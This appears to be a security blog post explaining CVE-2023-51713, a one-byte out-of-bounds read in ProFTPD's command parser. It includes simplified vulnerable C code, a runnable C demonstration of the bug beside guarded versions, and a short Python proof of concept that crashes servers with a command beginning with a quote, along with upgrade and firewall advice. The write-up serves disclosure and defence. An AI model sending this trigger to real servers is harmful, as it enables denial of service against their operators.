Summary:
CVE-2023-51713 is a one-byte out-of-bounds read in ProFTPD, a widely used FTP server, affecting versions before 1.3.8a. The flaw is in the make_ftp_cmd function in main.c and stems from how the command parser handles quote and backslash characters: a crafted command line makes the daemon read one byte outside the command buffer, which can crash it. In this post we break down how it works, show simplified code, and show how the condition can be triggered.

What Is ProFTPD?

ProFTPD is an open-source FTP server popular with Linux administrators because it is flexible and easy to configure. Like any network-facing software it has to parse untrusted input carefully, all the more so because it is usually run as a privileged service.

Where’s the Bug?

The problem is in the make_ftp_cmd function, which parses each incoming FTP command line. Part of that parsing handles quote (") and escape (\) characters. For certain inputs the logic "looks" one byte outside the command buffer, for example when a quote sits at the very boundary of the line or the command is otherwise oddly formatted.

> Key point:
> If ProFTPD looks past the allocated memory, it may read garbage, leak information, or just crash.

Here is a *simplified* version of what the code looks like around the problem (modelled on main.c, not the literal source):

/* Simplified illustration of the parsing loop, not the literal main.c source. */
char *make_ftp_cmd(const char *cmd) {
    const char *p = cmd;

    while (*p) {
        /* A quote is treated as escaped if the byte before it is a backslash.
         * When p == cmd, p[-1] is the byte before the buffer. */
        if (*p == '"' && p[-1] != '\\') {
            // ... quote-handling logic
        }
        p++;
    }
    return (char *) cmd;  /* simplified return */
}

The vulnerability is the p[-1] read, performed without checking that p is not at the very start of the buffer. If the command begins with a quote, p points at the first byte when that check runs, so p[-1] reads the byte immediately *before* the buffer: a one-byte out-of-bounds read.

How to Trigger the Vulnerability

Triggering the bug is simple:
Send a command line whose quoting is malformed, specifically one that begins with a quote character, so that the backslash check runs on the first byte of the buffer.

Here is a possible FTP session (pseudo):

"USER anonymous
PASS test

ProFTPD tries to parse the first line. On that leading quote the code checks p[-1], which lies outside the command buffer. Depending on compile options and runtime state, the read returns whatever byte happens to sit there, which can change how the line is parsed, or the daemon crashes.

Proof-of-concept in Python

import ftplib
from ftplib import FTP

# Timeout so a hung server does not also hang the PoC.
ftp = FTP('vulnerable-ftp.example.com', timeout=10)
try:
    print(ftp.sendcmd('"USER testuser'))  # Starts with a quote!
except ftplib.all_errors as exc:
    # Dropped connection or timeout is consistent with a server crash.
    print('no normal reply:', repr(exc))

Impact

This bug (CVE-2023-51713) affects all ProFTPD versions before 1.3.8a. Anyone with *network access* to the FTP control port can send a crafted command line and may bring the server down. The bug is not known to leak private data (a single out-of-bounds byte only influences parsing), but denial of service (DoS) is easy.

Affected: ProFTPD releases before 1.3.8a.
Fixed in: ProFTPD 1.3.8a.

How Was It Fixed?

The fix is to *never* read before the beginning of the buffer. In the simplified model, the patch adds a check so that p[-1] is only read when p is past the start of the buffer (p > buf, where buf is the start of the command).

Fixed code

if (p > buf && *p == '"' && p[-1] != '\\') {
    // Safe: p-1 is in-bounds!
}
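To make both the bug described under "Where's the Bug?" and the guard above concrete, here is an added, runnable illustration (my own code, not ProFTPD's source and not the actual patch): a toy quote/backslash scanner in the unguarded form and in a guarded form, plus a bounded unquoting routine. The command is deliberately placed one byte into a larger buffer so the byte "before the buffer" can be chosen, which makes the out-of-bounds dependence visible without undefined behaviour. The guard is written as p == cmd || p[-1] != '\\' rather than p > buf && ... so that a quote in the first position still counts as an unescaped quote. Function names and the sample line are assumptions for this example only.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not ProFTPD's code: a toy version of the quote/backslash
 * scan described in the post. Each scanner returns how many unescaped '"'
 * characters it sees in cmd[0..len).
 *
 * The unguarded scanner reproduces the bug: it tests p[-1] even when p is
 * the first byte of the command. scanners_disagree() below embeds the
 * command inside a larger buffer and picks the byte just in front of it,
 * so the effect can be observed without real undefined behaviour. */
static int unguarded_count_quotes(const char *cmd, size_t len) {
    int quotes = 0;
    for (const char *p = cmd; p < cmd + len; p++) {
        if (*p == '"' && p[-1] != '\\') {   /* BUG: p[-1] is outside cmd when p == cmd */
            quotes++;
        }
    }
    return quotes;
}

/* Hardened scanner. A quote in the first position has no preceding byte, so
 * it cannot be escaped; only look back when there is something to look at. */
static int guarded_count_quotes(const char *cmd, size_t len) {
    int quotes = 0;
    for (const char *p = cmd; p < cmd + len; p++) {
        if (*p == '"' && (p == cmd || p[-1] != '\\')) {
            quotes++;
        }
    }
    return quotes;
}

/* Bounded unquoting, the other half of what a command parser needs: copies
 * cmd[0..len) to out, dropping unescaped quotes and turning "\x" into "x".
 * It never reads before cmd or past cmd + len; a trailing backslash is kept
 * literally instead of stepping past the end of the line to find the
 * escaped character. Returns bytes written, or -1 if out is too small. */
static int unquote_arg(const char *cmd, size_t len, char *out, size_t outlen) {
    size_t o = 0;
    for (size_t i = 0; i < len; i++) {
        char c = cmd[i];
        if (c == '\\' && i + 1 < len) {      /* escape with a byte after it */
            c = cmd[++i];
        } else if (c == '"') {               /* unescaped quote: not part of the argument */
            continue;
        }
        if (o + 1 >= outlen) {
            return -1;                       /* keep room for the terminator */
        }
        out[o++] = c;
    }
    out[o] = '\0';
    return (int) o;
}

/* Convenience for checks: 1 if unquote_arg(cmd) yields exactly expected. */
static int unquote_equals(const char *cmd, const char *expected) {
    char out[128];
    int n = unquote_arg(cmd, strlen(cmd), out, sizeof out);
    return n >= 0 && strcmp(out, expected) == 0;
}

/* Place command at buf + 1 so that buf[0] plays the role of "the byte before
 * the buffer". Returns 1 if the two scanners disagree, 0 if they agree,
 * -1 if the command does not fit. */
static int scanners_disagree(char before, const char *command) {
    char buf[128];
    size_t len = strlen(command);
    if (len + 2 > sizeof buf) {
        return -1;
    }
    buf[0] = before;
    memcpy(buf + 1, command, len + 1);
    return unguarded_count_quotes(buf + 1, len) != guarded_count_quotes(buf + 1, len);
}

int main(void) {
    /* Constructed sample line, matching the PoC above. */
    const char *line = "\"USER testuser";
    char arg[64];

    printf("byte before buffer = ' ' : scanners disagree? %d\n", scanners_disagree(' ', line));
    printf("byte before buffer = '\\': scanners disagree? %d\n", scanners_disagree('\\', line));
    printf("bounded unquote: %d bytes -> [%s]\n",
           unquote_arg(line, strlen(line), arg, sizeof arg), arg);
    return 0;
}
```

Build with `cc -Wall -Wextra -o quotescan quotescan.c` and run it. With a space in front of the buffer the two scanners agree; with a backslash there, the unguarded scanner treats the leading quote as escaped while the guarded one does not. That is the whole problem in miniature: a parsing decision driven by a byte the command does not own. Against a real allocation (where cmd is the start of the object) the same unguarded read is what AddressSanitizer reports as a heap- or stack-buffer-underflow.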

Patching and Mitigations

If you run ProFTPD:

Upgrade to 1.3.8a or later. This is the only real fix.

Download the latest ProFTPD

If you cannot upgrade yet, restrict the FTP control port (TCP 21) at the firewall to trusted hosts. Note that the malformed line in the examples above is the USER command itself, sent before any authentication, so login restrictions do not help; the filtering has to happen at the network layer.

Reference:
- Official CVE Entry: CVE-2023-51713
- ProFTPD Release Notes

Conclusion

CVE-2023-51713 is a classic example of how tiny code mistakes in string handling can turn into big problems in network servers. Out-of-bounds reads are dangerous, especially in widely-used software.
Upgrading your ProFTPD installation is strongly recommended.

If you want to learn more, check out the ProFTPD GitHub repo to see the code and track new releases.

Timeline

Published on: 12/22/2023 03:15:09 UTC
Last modified on: 01/08/2024 19:06:50 UTC